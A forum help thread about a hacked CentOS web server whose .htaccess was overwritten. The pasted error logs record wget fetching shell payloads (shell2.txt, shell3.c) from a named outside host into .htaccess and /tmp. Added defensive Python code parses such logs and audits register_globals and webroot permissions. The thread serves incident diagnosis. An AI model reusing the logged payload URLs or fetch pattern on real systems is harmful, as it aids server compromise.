• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 748
  • Last Modified:

Server hacked, .htaccess file was changed

Hi experts,

I have a dedicated server with GoDaddy. It was attacked 3 times this morning. The .htaccess file on the server was modified and redirected to another IP: 64.28.191.117. It seems they are able to write anything to my server.
The following is the error log I got. It seems to be very helpful, but I still cannot figure out what the hole is and what I should do. Thanks a lot!

[-] prtctl: Invalid argument
[-] prtctl: Invalid argument
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]
 
    0K                                                       100%   33.38 MB/s
 
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]

0
Asked: z_ruixiang
1 Solution
 
Casey Herman (Citrix Engineer) commented:
If this is some sort of *NIX, you can change your permissions on the file to read-only.

Casey
0
 
Jan Springer commented:
That doesn't help if there is an application that is vulnerable.

Are you using PHP?  What version?  What version of Apache?

Has GoDaddy been notified?
0
 
Casey Herman (Citrix Engineer) commented:
That is right, because you can write code to change the file modes.

Casey
0
 
z_ruixiang (Author) commented:
I have changed all the files to read only, but it didn't help.
Apache/2.0.52  running on CentOS 4.
PHP Version 4.3.9
0
 
Jan Springer commented:
Upgrade Apache and PHP.  Run modsecurity.  Don't walk to the task, run -- before it is too late.
0
 
z_ruixiang (Author) commented:
Will this upgrading really help? Do I need to change my code if upgraded to PHP5?
0
 
Jan Springer commented:
If you are running a release of PHP or whatever that has a security vulnerability, then, YES, you need to upgrade.  If you don't want to go to PHP5, then upgrade to the latest PHP4.  And upgrade Apache while you're at it.  Install modsecurity v2.  Review your Apache config file and don't load modules such as proxying, etc., if you don't need or use them.
0
 
z_ruixiang (Author) commented:
Based on the log info, can we tell whether it's because of the Apache or PHP version? I mean, I really want to know what and where the hole is, how they could write on my server.
0
 
Jan Springer commented:
I'd put my 2 cents on php.  Some interesting reading:

http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/

If it were my machine, I'd scratch it and start over.  But do check that a root kit hasn't been installed -> www.chkrootkit.org.  Look in /tmp for applications and/or data that do not belong.
0
 
z_ruixiang (Author) commented:
I think you are right. I found this in error log:

--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]

And there is an unknown file in my /tmp.

Is it a security vulnerability of the PHP I have? I will upgrade it.
0
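The wget transcripts in the error log are the most useful evidence in this thread: each one records the remote URL and the local path it was written to. As an added example (not from the thread), here is a small Python parser that pulls each fetch out of such log text, pairs the URL with its destination and "saved" line, and flags completed downloads that land on .htaccess or in /tmp; the sample log text is constructed from the lines quoted above.

```python
import re
from dataclasses import dataclass
# Constructed sample: wget transcripts as pasted from the error log (two downloads, one noise line).
SAMPLE_LOG = """\
[-] prtctl: Invalid argument
--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]
"""

START_RE = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)$")        # "--HH:MM:SS--  URL"
DEST_RE = re.compile(r"^\s*=> `([^']+)'$")                        # "=> `/path'"
SAVED_RE = re.compile(r"^\d\d:\d\d:\d\d .* - `([^']+)' saved \[(\d+)/(\d+)\]$")

@dataclass
class Download:
    time: str
    url: str
    dest: str = ""
    size: int = -1          # bytes actually written; -1 until a "saved" line is seen
    saved: bool = False

    def reasons(self) -> list:  # why a defender should look at this download
        out = []
        if self.dest.endswith("/.htaccess"):
            out.append("overwrites .htaccess (redirect hijack)")
        if self.dest.startswith("/tmp/"):
            out.append("drops a file into /tmp (dropper staging)")
        if self.url.endswith((".c", ".pl", ".sh")):
            out.append("fetches source/script from a remote host")
        return out

def parse_wget_downloads(log_text: str) -> list:
    # pair each "--time-- URL" line with its destination line and its "saved" line
    downloads, current = [], None
    for line in log_text.splitlines():
        if m := START_RE.match(line):
            current = Download(time=m.group(1), url=m.group(2))
            downloads.append(current)
        elif current and (m := DEST_RE.match(line)):
            current.dest = m.group(1)
        elif current and (m := SAVED_RE.match(line)):
            current.saved, current.size = True, int(m.group(2))
    return downloads

def suspicious(log_text: str) -> list:
    return [d for d in parse_wget_downloads(log_text) if d.saved and d.reasons()]
```

Running `suspicious()` over the real error log gives a timeline of what was fetched and where it was written, which is the starting point for working out which script did the fetching.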
 
z_ruixiang (Author) commented:
Could you give me some instructions on how to upgrade to PHP5?
0
 
Jan Springer commented:
The problem with this is that applications could have been re-compiled by the hacker, and you most likely have no idea which apps these are.

Move your webserver temporarily somewhere else and re-install is my suggestion.
0
 
z_ruixiang (Author) commented:
I ran "yum update php", but it seems 4.3.9 is the latest version I can get.
0
 
z_ruixiang (Author) commented:
What should I do to prevent it from being attacked if I get a new server? I'm not sure whether they would still do that if I move to a totally new server.
0
 
Jan Springer commented:
1) install all of the latest versions of kernel and apps
2) keep a spreadsheet of current OS and application versions installed
3) subscribe to bugtraq at www.securityfocus.com
4) run modsecurity v2 with Apache 2.2.x
5) use iptables
6) periodically update and run chkrootkit -> www.chkrootkit.org
7) turn globals off in php
8) sanitize input variables to scripts and cgis
0
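Step 7 of that list, and the .htaccess tampering that started the thread, can both be checked mechanically. Added example, not from the thread: a Python audit that reports the effective register_globals value from php.ini text (the last assignment wins) and scans a webroot for recently changed .htaccess files and world-writable entries. build_demo_webroot is a hypothetical helper that creates a constructed layout in a temporary directory so the audit can be exercised offline; point audit_webroot at the real document root instead.

```python
import os
import re
import stat
import tempfile
import time
from pathlib import Path

# Constructed php.ini fragment; in php.ini the last assignment of a directive wins.
SAMPLE_PHP_INI = "; defaults\nregister_globals = Off\n[custom]\nRegister_Globals = On\n"
SETTING_RE = re.compile(r'^\s*register_globals\s*=\s*"?(\w+)"?', re.I | re.M)

def register_globals_enabled(php_ini_text: str) -> bool:
    """Step 7: True if the effective register_globals value is on."""
    values = SETTING_RE.findall(php_ini_text)
    return bool(values) and values[-1].lower() in ("on", "1", "true", "yes")

def audit_webroot(root: str, max_age_hours: float = 24, now: float = None) -> list:
    """Flag .htaccess files touched within max_age_hours and world-writable entries."""
    now = time.time() if now is None else now
    findings = []
    for path in sorted(Path(root).rglob("*")):
        st = path.lstat()
        rel = str(path.relative_to(root))
        if path.name == ".htaccess" and now - st.st_mtime < max_age_hours * 3600:
            findings.append((rel, "recently modified .htaccess"))
        if st.st_mode & stat.S_IWOTH and not stat.S_ISLNK(st.st_mode):
            findings.append((rel, "world-writable"))
    return findings

def build_demo_webroot() -> str:
    """Constructed layout: a fresh .htaccess, a ten-day-old one, and a 0666 upload file."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    for sub in ("public_html", "public_html/uploads", "blog"):
        (root / sub).mkdir()
        os.chmod(root / sub, 0o755)
    fresh = root / "public_html" / ".htaccess"
    fresh.write_text("RewriteEngine on\n")
    os.chmod(fresh, 0o644)
    old = root / "blog" / ".htaccess"
    old.write_text("Options -Indexes\n")
    os.chmod(old, 0o644)
    ten_days_ago = time.time() - 10 * 86400
    os.utime(old, (ten_days_ago, ten_days_ago))
    loose = root / "public_html" / "uploads" / "image.php"
    loose.write_text("<?php ?>\n")
    os.chmod(loose, 0o666)
    return str(root)
```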